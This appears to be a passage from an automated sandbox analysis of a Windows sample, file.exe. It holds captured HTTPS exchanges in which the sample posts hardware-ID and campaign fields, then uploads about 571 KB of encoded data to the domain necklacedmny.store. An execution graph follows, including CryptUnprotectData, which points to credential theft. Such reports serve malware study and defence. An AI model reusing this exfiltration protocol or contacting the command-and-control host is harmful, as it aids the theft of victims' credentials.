                                                                                  2024-10-31 09:15:10 UTC1219OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 35 43 39 31 36 44 34 31 36 45 45 35 35 32 42 41 44 43 30 34 36 41 41 30 36 34 30 30 35 45 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"35C916D416EE552BADC046AA064005E5--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                  2024-10-31 09:15:10 UTC1016INHTTP/1.1 200 OK
                                                                                  Date: Thu, 31 Oct 2024 09:15:10 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=5d0p9n1vcne4r3fth9sf51ngpu; expires=Mon, 24-Feb-2025 03:01:49 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DwxHkw4oouEE4qMo8csN%2BUWXWDdm3Bp413dcWa8OzDLWo%2BfCFNbhTjRw%2B%2BWS5JJnZ1LeVLwpoIlIJh8kBdBbl2Mlu4g04cHA123T5zwq8WhqbEY13dli0FZ1oc0kG0X8lWlwRrU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8db289fe595045ea-DFW
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2241&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=2138&delivery_rate=1293434&cwnd=222&unsent_bytes=0&cid=89729a0bb95f4708&ts=492&x=0"
                                                                                  2024-10-31 09:15:10 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
                                                                                  Data Ascii: 11ok 173.254.250.77
                                                                                  2024-10-31 09:15:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.649717188.114.97.34433084C:\Users\user\Desktop\file.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-31 09:15:12 UTC285OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 571023
                                                                                  Host: necklacedmny.store
                                                                                  2024-10-31 09:15:12 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 35 43 39 31 36 44 34 31 36 45 45 35 35 32 42 41 44 43 30 34 36 41 41 30 36 34 30 30 35 45 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"35C916D416EE552BADC046AA064005E5--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                  2024-10-31 09:15:12 UTC15331OUTData Raw: a6 49 74 73 56 66 84 31 36 72 a6 6a 92 6f c3 bc 45 85 ac 3c 3e 56 de 28 35 45 4f ea 4a 62 f9 64 5c 5d 72 31 a3 f2 b3 74 d1 08 9f d1 c3 f0 43 bd d8 58 f1 07 45 dc 62 3c 18 47 b5 4f f1 7e 19 aa d2 0d 12 38 77 a4 88 57 21 22 2b 5e ff 86 09 a1 7f 7f 34 ec 27 31 2b 44 67 a0 da 27 d7 c5 fa 8a 86 23 19 22 44 35 dd 29 03 80 b1 3d 51 81 3b 4d a2 64 cc 1b 19 c6 44 d8 13 9e 27 5b ab d2 fb 96 cc e1 98 41 98 2d 24 b8 25 81 e9 43 c3 f1 dc 5b 91 1a 1f af 8f db c6 a9 8f 2b bd fc e2 c0 7c e6 60 cd b2 a7 4b c7 6d df f2 7b 3c 07 07 a5 9d b8 f1 a2 d6 0f 7c d7 2a 34 37 96 fe b8 cb ed 48 80 32 51 91 ac 30 12 2c 30 4d c9 d7 74 6d 20 75 60 2f 32 b2 fb fd 24 77 1a a5 cd 6f 58 70 0f 8d 45 6f d7 87 ed b3 34 c4 c2 b3 f8 12 4a f2 0a fb 4a 31 24 a9 f4 f5 55 cb 8b 66 6a 05 5f ac 7b fa
                                                                                  Data Ascii: ItsVf16rjoE<>V(5EOJbd\]r1tCXEb<GO~8wW!"+^4'1+Dg'#"D5)=Q;MdD'[A-$%C[+|`Km{<|*47H2Q0,0Mtm u`/2$woXpEo4JJ1$Ufj_{
                                                                                  2024-10-31 09:15:12 UTC15331OUTData Raw: aa b5 02 92 5e 3f ca da c3 f0 03 e6 1b c7 6e f7 73 9f c0 04 66 fd 9a f9 40 4b 4a 41 25 bb 79 a2 f3 d1 c7 f0 0a d1 db f4 1f be a2 51 2f 4a 79 ef 7f 44 12 ba 3a d8 2f 1c 08 1e bd 9d 86 f3 07 32 d7 16 de 0c 57 f7 7e 50 25 35 1c d9 7d 87 dd 59 56 3b 9e 58 ed 55 54 35 bf 1e 32 ec 55 36 32 19 ce 5d c9 ac aa 5a d8 fc 10 e2 37 7b b4 8c fc e5 ef d7 10 e3 5d 00 f7 93 93 d6 4f b3 80 ff 7e 64 96 af 74 e8 ab c3 75 05 dc c5 f3 ac c1 cc c0 9d a1 2f 62 ce 1b 87 14 e4 a4 96 36 7f dc 5e a3 8f fe ab 26 6c e2 fc f5 f5 46 86 e8 d8 f2 7d 87 ea f9 6f e1 ac b1 a7 82 35 1d bf d7 4c fe a4 f0 ad 86 d3 51 c5 2c d2 9e 1b 49 7b e8 5d fe 2a b7 af 0f 0b 5b 19 73 4a 1c aa ee be 1b 2a b9 f9 cf 10 7b bd aa 9e 3f 87 a5 1c 36 1a f9 d5 c3 c0 a2 bc 23 f2 c1 7e ef a0 20 d8 af 71 f2 d9 0e 23 ef
                                                                                  Data Ascii: ^?nsf@KJA%yQ/JyD:/2W~P%5}YV;XUT52U62]Z7{]O~dtu/b6^&lF}o5LQ,I{]*[sJ*{?6#~ q#
                                                                                  2024-10-31 09:15:12 UTC15331OUTData Raw: 4f 40 5d b0 77 c0 e6 9f 04 24 73 f2 da da 55 2b 5c c6 ca 9d 43 da 4f 4a c0 61 f6 db d9 4a 23 77 48 9b d1 6a 34 3a d7 e1 84 1c f8 cb 9c 79 d0 5d bd b2 fa 21 2f 9e 2d 68 5b 84 e6 54 4c 3f 73 4e 11 97 e8 8e dc a0 ea a7 a7 56 57 ca de a8 ef 0a 2c 6e 84 2e b3 47 ff 6c 82 f9 6e eb 87 08 e6 a4 bf 5d 04 02 b0 6b ff 0c 65 dc d8 3c ba ff 27 ff cc 27 4c 94 ed e3 2d aa 1f be 17 f0 6d 55 1c c7 7f 82 a3 ee a9 cf 6e 2b bf 28 70 9e f6 39 b5 74 79 68 c3 21 fb 85 cf 84 ac 91 b0 cc 6d b7 75 81 fc 9a 1b f5 fd bc 52 d1 f0 73 35 1d d8 4e fc 73 b3 37 70 b5 21 ec 10 25 0e 2b 7a 4b ad 6f a8 d4 d5 b4 90 6a e9 b6 a3 e1 e2 ed 0f 8c ef 9c de 7c f3 b5 e9 7f 4b b6 6e ed fe d4 ef c8 0a 34 da 2a 2a 05 03 49 ef d1 54 a6 22 d3 54 00 e8 0b 40 31 fc 60 b4 3c 47 0b db c1 c7 9e 42 01 65 34 9d
                                                                                  Data Ascii: O@]w$sU+\COJaJ#wHj4:y]!/-h[TL?sNVW,n.Gln]ke<''L-mUn+(p9tyh!muRs5Ns7p!%+zKoj|Kn4**IT"T@1`<GBe4
                                                                                  2024-10-31 09:15:12 UTC15331OUTData Raw: 07 38 55 1b 96 6f fa f1 10 57 d7 13 1e 85 93 53 79 73 16 06 ff 17 5f 35 99 c9 d9 aa ae 72 a5 ee ea a0 e9 c0 e1 bb f0 8c dd 62 89 26 88 fa 06 10 9f 65 bc 09 b7 7b 7e 3b 32 2a e6 f9 82 28 26 ab c8 0e 7f e4 d7 5f 5e dc 72 3e f9 0e 0a e3 10 71 cf 4c 1e 58 f8 f3 9a ff bf 83 75 24 0f 2d ad 0c 01 c3 63 79 f0 9e d0 54 53 71 08 91 7a 78 ad 20 19 5e b0 a0 6b fb 9c 88 d5 bf ac 02 2c d8 5c 75 72 42 2c ba f1 cc ee 1f 89 84 0d 1a b6 32 38 99 ff 17 24 15 26 ae c9 71 9c 05 33 ef 4c df be c4 78 d6 49 7d d0 80 7f 2f 74 a9 32 4b 83 c2 4f 30 d5 04 e7 d3 b6 cf ba c6 6f dc be 4b 5a 3c d2 ee d4 ad 4c 66 ea 01 43 1f 4e 11 ee 08 bf b1 09 48 fa ed 54 1b d6 89 cd db 2d a7 b0 dd 38 c0 9e aa bd 99 bb 04 26 08 97 df 5b 9f 20 b7 08 e4 14 5a 8e 41 b7 3e 50 aa 42 49 a5 1b c2 93 a7 4b 97
                                                                                  Data Ascii: 8UoWSys_5rb&e{~;2*(&_^r>qLXu$-cyTSqzx ^k,\urB,28$&q3LxI}/t2KO0oKZ<LfCNHT-8&[ ZA>PBIK
                                                                                  2024-10-31 09:15:12 UTC15331OUTData Raw: 63 dc 34 52 47 89 36 df e7 c9 73 46 0d 72 8d a1 6f 5e fb 6a 0c 2b fc f5 82 62 b4 4d 10 8d 2b c1 ec 2d 34 75 1a 8e d5 00 90 f6 f7 30 ac 7b f0 88 f2 d8 45 8f 56 94 05 a3 c2 5e 50 5b ad 26 41 a0 f8 68 ea 5c c2 e6 cd 08 03 dd 76 3b 28 33 48 1c 25 3f 3e 58 6e 9d 96 fa d6 95 a5 f3 5b 47 ae 18 c5 08 0c 1f 4f 84 fa 56 c9 2e 04 d4 3b 59 37 06 58 1e 21 71 de 53 17 55 88 44 ae 85 da f2 5b 08 38 96 a1 c9 e5 bc 32 cd 53 8b ef 79 91 42 40 cb 2b 00 5a 0c d7 40 20 66 e8 78 71 27 04 18 2e 00 bc 38 4a 11 05 35 62 4a 91 63 4f 1c 04 c0 a9 1e 73 4c d9 a8 34 45 3a 94 9c b0 2a 82 06 22 46 75 83 85 d2 5a 57 14 95 ee 20 fa 60 07 cc 7d 7e 5a 33 5c c1 53 04 a7 c7 32 71 30 89 4d d7 62 15 09 ff 77 e5 d4 cb 68 39 bc 0d c1 46 0c 8f c2 d8 36 f0 dc 51 ea 92 eb b1 87 83 83 89 3d ae f5 7e
                                                                                  Data Ascii: c4RG6sFro^j+bM+-4u0{EV^P[&Ah\v;(3H%?>Xn[GOV.;Y7X!qSUD[82SyB@+Z@ fxq'.8J5bJcOsL4E:*"FuZW `}~Z3\S2q0Mbwh9F6Q=~
                                                                                  2024-10-31 09:15:12 UTC15331OUTData Raw: 0a 9e e4 f7 6f d7 5d 86 24 84 6e 6e 6b d5 44 9b ea 4f 69 ed c4 19 09 bf 5d 84 27 1e 2b 1c 2b 30 b3 82 df c6 ed 21 68 62 c7 8a db 50 31 13 76 88 eb 7d ab 6c b8 4f 3a 8a 20 3d c0 ea 96 eb 3f 9d 53 13 13 5a 3e fe 38 96 88 98 6e 5d 61 d1 69 3b 7d 36 ae 48 95 8e 78 dc 7c 63 2e 6d 2d 69 a1 3a 08 7e f1 57 87 50 65 ad e1 b6 c1 a0 a8 0f 39 08 c4 4d a2 f7 8b 31 4b 6d 27 0e 14 04 fb 15 d2 c5 ef 00 c2 de e5 7a c3 3a 73 13 89 c5 b7 fd f5 8d b1 1f 76 27 6b 8e ec cb fb a4 86 81 03 c1 ac 09 99 ac b7 d8 99 ee 0e 11 87 23 08 8b 72 3b d7 e4 6c 2e f0 e3 a9 d2 d7 79 63 ee 6a 5b f7 96 d6 a6 c6 dc 5f ab 75 a0 18 77 02 83 55 dc d9 9d c2 cd ec 23 44 e5 41 ba b7 84 f6 3d 33 27 79 94 d8 fe 5b c3 e6 0d 92 05 37 72 b4 5c 95 af d6 96 e3 40 b7 a9 e6 8f a2 c5 1a 5b 90 95 51 db de 11 4c
                                                                                  Data Ascii: o]$nnkDOi]'++0!hbP1v}lO: =?SZ>8n]ai;}6Hx|c.m-i:~WPe9M1Km'z:sv'k#r;l.ycj[_uwU#DA=3'y[7r\@[QL
                                                                                  2024-10-31 09:15:12 UTC15331OUTData Raw: 8d 20 d5 1c f4 8d 99 e1 92 f6 83 4b 3f 12 de 44 68 13 b3 eb cd a2 cd da 78 1a 77 bc 4d bf 18 0b 32 e3 c5 25 ce b1 db 93 42 45 4f 03 33 8d 1b 57 01 19 da 44 fc ac 54 82 14 ea fd 8f 8b fa 95 19 a4 89 51 3a cc 4a f1 49 43 fd dc b2 a1 d1 18 b2 6c 28 40 6b dc de 65 fd eb ce 15 96 11 58 34 8a b4 2c 8c 61 1f 2c f8 ba 21 34 61 1c b6 ac 31 ac be 1f a3 0a dd fa c5 f4 c8 15 96 54 35 3e 16 2d bc b3 73 66 58 3c 43 ee fb 68 7b ae 68 da 8e 25 db a8 6d 0c 09 8e 09 63 9d 60 25 48 f0 f1 9e 3d 5a 68 06 97 a7 46 5a 0c 21 48 2c c3 90 aa f5 45 4b 14 9c 2e 13 92 c3 89 a8 70 44 3a 34 5d d8 29 cd e6 b9 1c e6 3c 3a 61 b0 15 b0 60 c4 4f 8d f7 6d 65 80 a9 37 bf 82 db bf ac 1a 62 16 c4 33 22 4d a8 21 7f 4d 57 7e dc 39 3e 40 39 e3 2d bd d0 bd 37 21 c2 53 d5 fc 1b 06 fe 10 1f a8 a9 23
                                                                                  Data Ascii: K?DhxwM2%BEO3WDTQ:JICl(@keX4,a,!4a1T5>-sfX<Ch{h%mc`%H=ZhFZ!H,EK.pD:4])<:a`Ome7b3"M!MW~9>@9-7!S#
                                                                                  2024-10-31 09:15:12 UTC15331OUTData Raw: 1b 28 3d 45 1b dc 1b e2 c8 bb fd 0c 90 29 db a3 1e 07 9c e0 58 ea 7a 26 55 6c 92 a9 44 ff a1 45 3f 6b 55 2c fe 77 c7 8e c4 c5 9a e3 10 f6 49 2d 85 3d 1f db ae 2a 1b fa e2 41 c4 d9 97 2c f7 c6 56 c1 b3 d8 16 66 d0 73 82 5c 4c 38 e6 49 7d 90 61 d9 ff ce 96 f9 7d 60 8d 57 43 13 f4 bf 5e e6 dc 97 ab c5 8c e7 df ba fd 10 2b 0e ee a7 b1 29 ab 5a f7 3a 11 d0 b4 88 53 71 ee 0b fc a1 36 b9 68 3d 7d f5 6c 99 cd c8 74 05 c9 2b bc aa 7d 63 ef 74 cb 91 10 e2 89 c6 d2 2d 6d ff 6f 72 3a c1 ce 52 ec d0 2e dc ef 22 25 08 5c 7d 5f 5d 5d d2 06 ff d7 5f 53 d0 f2 bd 18 20 92 b3 33 39 cd 9a 8e 6b 26 3d ae 5c 42 11 4d 15 de 23 be 97 18 1b 69 80 e1 f7 d6 e6 4a d3 c7 bb f0 87 47 dc e5 79 e3 08 3a df d1 92 3d 29 61 e5 a2 50 19 51 5d 0c 9a c8 30 3e 16 06 31 88 34 a3 38 6a 00 8f b9
                                                                                  Data Ascii: (=E)Xz&UlDE?kU,wI-=*A,Vfs\L8I}a}`WC^+)Z:Sq6h=}lt+}ct-mor:R."%\}_]]_S 39k&=\BM#iJGy:=)aPQ]0>148j
                                                                                  2024-10-31 09:15:12 UTC15331OUTData Raw: a2 1c 71 5d bb 79 c9 03 cf 11 e0 7a 1f a2 4a 0a bc bd 89 71 ec cc 44 58 20 48 fd 5b ea 8c 91 e0 37 74 19 c2 ff 38 e8 a0 64 b6 f1 e4 a2 16 9f ea 58 97 42 68 20 29 d4 44 aa 4e b0 a0 59 ae eb ed fd db 09 10 d7 50 ff cc 5f 63 46 90 e7 48 7c dc ab 29 f2 df 25 a2 6c 3a 95 02 46 c8 73 77 24 51 22 cc d9 b4 81 38 03 b8 0f d0 e5 b6 8b a5 df 14 30 77 af 37 ea 8e 89 e4 ca db f1 03 a5 da 1f ad b9 3a 00 df 2c c8 ab 51 20 15 2f 88 fd 74 8c b2 2c 74 91 0a 6f 99 de 38 24 49 8b a1 7a 61 c5 9a 48 8f a0 2e f5 5e ea e9 b9 81 fb 48 bb d1 75 89 99 2b bf 2c 1f b0 c5 80 09 5c 95 21 16 46 20 19 d7 10 0f d1 ae 89 e3 53 8e bb 4d d5 2b 29 f8 e1 8a 77 de 04 29 62 74 85 de e1 db 55 77 90 67 e2 55 9b df 8b 05 f1 cb 48 1e da 3e e5 be d6 69 56 83 13 d7 66 28 d3 5d bc 9b 0d a3 b0 3c 8a cb
                                                                                  Data Ascii: q]yzJqDX H[7t8dXBh )DNYP_cFH|)%l:Fsw$Q"80w7:,Q /t,to8$IzaH.^Hu+,\!F SM+)w)btUwgUH>iVf(]<
                                                                                  2024-10-31 09:15:14 UTC1016INHTTP/1.1 200 OK
                                                                                  Date: Thu, 31 Oct 2024 09:15:14 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=6bp86odttihcoig5tvmgf47ukp; expires=Mon, 24-Feb-2025 03:01:53 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BLTLjXNrMITlaNYXI6BkXMMMboEIfjnEQdqdaPN7NsACVYxhIawMSA1%2Br14gbaT81CzSE0dLxFt2RMB6cLOoeAubtnKKtaWcrMI3GxUY8HOcPjX7UrnS6Hm2UAcI8bFFg69h3AU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8db28a0cfb75461e-DFW
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1597&sent=216&recv=606&lost=0&retrans=0&sent_bytes=2846&recv_bytes=573572&delivery_rate=638447&cwnd=251&unsent_bytes=0&cid=b1ef702cc54f0eca&ts=1730&x=0"


                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:0
                                                                                  Start time:05:15:01
                                                                                  Start date:31/10/2024
                                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                  Imagebase:0x670000
                                                                                  File size:2'948'608 bytes
                                                                                  MD5 hash:CEC67349E89DE3D1BFD88F409F7C0ED2
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Disassembly

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:7.8%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:59.5%
                                                                                    Total number of Nodes:257
                                                                                    Total number of Limit Nodes:24
                                                                                    execution_graph 12923 6abca9 12924 6abcf0 12923->12924 12924->12924 12925 6abd18 SysAllocString 12924->12925 12926 6abd45 12925->12926 12927 6ac09a SysFreeString SysFreeString 12926->12927 12928 6abd55 CoSetProxyBlanket 12926->12928 12929 6abd79 12926->12929 12930 6ac0b0 12926->12930 12932 6ac107 12926->12932 12940 6ac10f 12926->12940 12927->12930 12928->12927 12928->12929 12928->12930 12928->12932 12928->12940 12929->12927 12929->12932 12929->12940 12936 6ac0e6 GetVolumeInformationW 12930->12936 12931 6ac332 12949 6ae210 12931->12949 12935 6ac2ce 12935->12931 12935->12932 12937 6ae510 LdrInitializeThunk 12935->12937 12938 6ae700 LdrInitializeThunk 12935->12938 12953 6ae650 12935->12953 12936->12932 12936->12940 12937->12935 12938->12935 12940->12931 12940->12932 12940->12935 12945 6ae1b0 12940->12945 12942 6ac243 12942->12935 12948 6b0f10 LdrInitializeThunk 12942->12948 12946 6ae1d0 12945->12946 12946->12946 12947 6ae1f8 RtlAllocateHeap 12946->12947 12947->12942 12948->12935 12950 6ae228 RtlFreeHeap 12949->12950 12951 6ac338 12949->12951 12950->12951 12951->12932 12957 6b0f10 LdrInitializeThunk 12951->12957 12954 6ae65a 12953->12954 12956 6ae6ce 12953->12956 12954->12956 12958 6b0f10 LdrInitializeThunk 12954->12958 12956->12935 12957->12932 12958->12956 12959 680ca0 CoInitializeSecurity 12961 680cc2 12959->12961 12960 68103d 12961->12960 12962 6ae210 RtlFreeHeap 12961->12962 12962->12961 12963 695160 12964 6951b0 12963->12964 12965 69516e 12963->12965 12967 695270 12965->12967 12968 695280 12967->12968 12971 6b46d0 12968->12971 12970 69535f 12972 6b46f0 12971->12972 12973 6b482e 12972->12973 12975 6b0f10 LdrInitializeThunk 12972->12975 12973->12970 12975->12973 12976 6b11e1 12977 6b11e0 12976->12977 12977->12976 12979 6b11ee 12977->12979 12982 6b0f10 LdrInitializeThunk 12977->12982 12981 6b0f10 LdrInitializeThunk 12979->12981 12981->12979 12982->12979 12983 68f522 12985 68f520 12983->12985 12984 68f696 12984->12984 12985->12983 12985->12984 12986 6b46d0 LdrInitializeThunk 12985->12986 12986->12985 12987 696022 12989 696046 12987->12989 12990 6961d8 12989->12990 12991 6b0f10 LdrInitializeThunk 12989->12991 12991->12989 12992 695b27 12993 695b2f 12992->12993 12994 6ae1b0 RtlAllocateHeap 12993->12994 12997 695b5a 12994->12997 12995 695c56 12997->12995 12998 6b0f10 LdrInitializeThunk 12997->12998 12998->12997 12999 6b0e25 13000 6b0ee8 12999->13000 13001 6b0e33 12999->13001 13002 6b0e41 RtlReAllocateHeap 12999->13002 13003 6b0ee0 12999->13003 13005 6ae210 RtlFreeHeap 13000->13005 13001->13000 13001->13002 13007 6b0ee6 13002->13007 13004 6ae1b0 RtlAllocateHeap 13003->13004 13004->13007 13005->13007 13008 68d7f8 13009 68d7fd 13008->13009 13011 68d849 13009->13011 13013 68db7e 13009->13013 13015 68d90e 13009->13015 13016 6b4950 13009->13016 13011->13013 13011->13015 13022 6b0f10 LdrInitializeThunk 13011->13022 13014 68db5f CryptUnprotectData 13014->13013 13015->13013 13015->13014 13017 6b4970 13016->13017 13020 6b49ce 13017->13020 13023 6b0f10 LdrInitializeThunk 13017->13023 13018 6b4a7e 13018->13011 13020->13018 13024 6b0f10 LdrInitializeThunk 13020->13024 13022->13015 13023->13020 13024->13018 13025 681bfc 13027 681a5a 13025->13027 13026 681e18 13027->13025 13027->13026 13028 6ae210 RtlFreeHeap 13027->13028 13028->13027 13029 6b5670 13031 6b5681 13029->13031 13030 6b572e 13032 6ae1b0 RtlAllocateHeap 13030->13032 13037 6b58f4 13030->13037 13031->13030 13039 6b0f10 LdrInitializeThunk 13031->13039 13034 6b5797 13032->13034 13036 6b583e 13034->13036 13040 6b0f10 LdrInitializeThunk 13034->13040 13035 6ae210 RtlFreeHeap 13035->13037 13036->13035 13039->13030 13040->13036 13041 6b4d70 13042 6b4d90 13041->13042 13044 6b4dee 13042->13044 13051 6b0f10 LdrInitializeThunk 13042->13051 13043 6b502c 13044->13043 13046 6ae1b0 RtlAllocateHeap 13044->13046 13048 6b4e88 13046->13048 13047 6ae210 RtlFreeHeap 13047->13043 13050 6b4eff 13048->13050 13052 6b0f10 LdrInitializeThunk 13048->13052 13050->13047 13050->13050 13051->13044 13052->13050 13054 6b1336 13055 6b1360 13054->13055 13056 6b13ae 13055->13056 13060 6b0f10 LdrInitializeThunk 13055->13060 13056->13056 13059 6b0f10 LdrInitializeThunk 13056->13059 13059->13056 13060->13056 13061 687089 13062 6870d0 13061->13062 13065 68d010 13062->13065 13064 6870f3 13066 68d190 13065->13066 13066->13066 13077 6b4520 13066->13077 13068 68d30c 13069 6b4950 LdrInitializeThunk 13068->13069 13070 68d35e 13068->13070 13072 68d561 13068->13072 13073 68d688 13068->13073 13076 68d36d 13068->13076 13069->13070 13070->13072 13070->13073 13070->13076 13081 6b0f10 LdrInitializeThunk 13070->13081 13074 6b4520 LdrInitializeThunk 13072->13074 13073->13073 13075 6b4520 LdrInitializeThunk 13073->13075 13074->13073 13075->13073 13076->13064 13076->13076 13078 6b4540 13077->13078 13079 6b467e 13078->13079 13082 6b0f10 LdrInitializeThunk 13078->13082 13079->13068 13081->13072 13082->13079 13083 68104f 13088 681054 13083->13088 13084 681378 CoUninitialize 13087 6813b0 13084->13087 13085 6979b0 LdrInitializeThunk 13090 6811f4 13085->13090 13088->13085 13088->13087 13101 681305 13088->13101 13102 681257 13088->13102 13089 6812a2 13091 698290 3 API calls 13089->13091 13113 698290 13090->13113 13094 6812da 13091->13094 13093 68122c 13119 69ab20 13093->13119 13096 69ab20 3 API calls 13094->13096 13098 6812fc 13096->13098 13100 69b070 3 API calls 13098->13100 13100->13101 13101->13084 13103 6979b0 13102->13103 13105 697a20 13103->13105 13104 6b46d0 LdrInitializeThunk 13110 697c31 13104->13110 13105->13104 13105->13105 13107 697ef2 13107->13107 13140 695390 13107->13140 13109 697dd0 13109->13089 13110->13107 13110->13109 13110->13110 13111 6b46d0 LdrInitializeThunk 13110->13111 13112 697db7 13110->13112 13111->13112 13112->13107 13112->13109 13137 695540 13112->13137 13114 69829e 13113->13114 13148 6b4c40 13114->13148 13116 69837a 13118 698045 13116->13118 13152 6b5040 13116->13152 13118->13093 13120 69ab40 13119->13120 13121 69abae 13120->13121 13165 6b0f10 LdrInitializeThunk 13120->13165 13122 68124e 13121->13122 13123 6ae1b0 RtlAllocateHeap 13121->13123 13129 69b070 13122->13129 13126 69ac63 13123->13126 13125 6ae210 RtlFreeHeap 13125->13122 13128 69acee 13126->13128 13166 6b0f10 LdrInitializeThunk 13126->13166 13128->13125 13167 69b090 13129->13167 13138 6b4520 LdrInitializeThunk 13137->13138 13139 695595 13138->13139 13141 6954a1 13140->13141 13142 6953ee 13140->13142 13143 6953e1 13140->13143 13144 69551d 13140->13144 13141->13144 13146 695540 LdrInitializeThunk 13141->13146 13147 695540 LdrInitializeThunk 13142->13147 13145 695540 LdrInitializeThunk 13143->13145 13144->13109 13145->13141 13146->13144 13147->13143 13149 6b4c60 13148->13149 13151 6b4d3f 13149->13151 13162 6b0f10 LdrInitializeThunk 13149->13162 13151->13116 13154 6b5060 13152->13154 13153 6b50be 13155 6b5314 13153->13155 13156 6ae1b0 RtlAllocateHeap 13153->13156 13154->13153 13163 6b0f10 LdrInitializeThunk 13154->13163 13155->13116 13159 6b50ff 13156->13159 13158 6ae210 RtlFreeHeap 13158->13155 13161 6b517e 13159->13161 13164 6b0f10 LdrInitializeThunk 13159->13164 13161->13158 13162->13151 13163->13153 13164->13161 13165->13121 13166->13128 13168 69b0f0 13167->13168 13168->13168 13171 6ae2c0 13168->13171 13172 6ae2f0 13171->13172 13173 6ae34e 13172->13173 13181 6b0f10 LdrInitializeThunk 13172->13181 13174 6ae1b0 RtlAllocateHeap 13173->13174 13179 69b155 13173->13179 13177 6ae3cc 13174->13177 13176 6ae210 RtlFreeHeap 13176->13179 13178 